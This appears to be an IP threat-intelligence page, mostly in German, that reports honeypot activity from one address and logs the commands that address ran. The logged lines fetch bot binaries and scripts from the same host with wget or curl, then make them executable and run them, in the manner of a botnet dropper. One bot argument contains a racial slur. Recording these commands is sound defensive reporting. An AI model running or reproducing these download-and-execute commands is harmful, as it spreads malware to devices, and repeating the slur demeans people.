Aktive Bedrohung • MITTEL
176.65.139.52
Herkunftsland🇩🇪 Alemania
Erste Erkennung17.3.2026
Letzte Aktivitat13.4.2026
ISPPfcloud UG (haftungsbeschrankt)
🎯
86
Gesamtangriffe
🔌
2
Ports
📡
2
Angriffsarten
🦠
2
Malware
Geolokalisierung
- Land
- 🇩🇪 Alemania
- Stadt
- Unbekannt
- ASN
- AS51396
- ISP
- Pfcloud UG (haftungsbeschrankt)
Angriffsarten
adb_honeypot
web_honeypot
Angegriffene Ports
805555
Zugehorige Malware
Ausgefuhrte Befehle
$
echo hello7x$
chmod 777 /data/local/tmp/parm7 && /data/local/tmp/parm7 testarm3x$
chmod 777 /data/local/tmp/bot; nohup /data/local/tmp/bot CarpLoverNigga > /dev/null 2>&1 &3x$
chmod 777 /data/local/tmp/sex.sh && /data/local/tmp/sex.sh testarm2x$
cd /data/local/tmp; rm -rf sex.sh; wget http://176.65.139.52:8080/bins/sex.sh 2>/dev/null || curl -o sex.sh http://176.65.139.52:8080/bins/sex.sh 2>/dev/null; chmod 777 sex.sh; ./sex.sh; rm -rf sex.sh2x$
cd /data/local/tmp; rm -rf parm7; wget http://176.65.139.52:8080/bins/parm7 2>/dev/null || curl -o parm7 http://176.65.139.52:8080/bins/parm7 2>/dev/null; chmod 777 parm7; ./parm7 testarm; rm -rf parm72x$
nohup sh -c 'cd /data/local/tmp || cd /tmp || cd /var; wget http://176.65.139.52/armv7 -O b; chmod +x b; ./b CarpLoverNigga >/dev/null 2>&1 & sleep 1' > /dev/null 2>&1 &2x$
cat > /data/local/tmp/bot_p; chmod 777 /data/local/tmp/bot_p; /data/local/tmp/bot_p CarpLoverNigga2x$
echo VULNERABLE1x$
cd /data/local/tmp; rm -rf parm7; wget http://176.65.139.52:8080/bins/parm7 2>/dev/null || curl -o parm7 http://176.65.139.52:8080/bins/parm7 2>/dev/null; chmod 777 parm7; ./parm7; rm -rf parm71xShodan InternetDB ExpositionShodan
InternetDB-Daten, nicht in Echtzeit
Ports
22
CPEs
cpe:/o:canonical:ubuntu_linuxcpe:/a:openbsd:openssh:8.9p1
Risikobewertung
55
/100
NiedrigMittelHochKritisch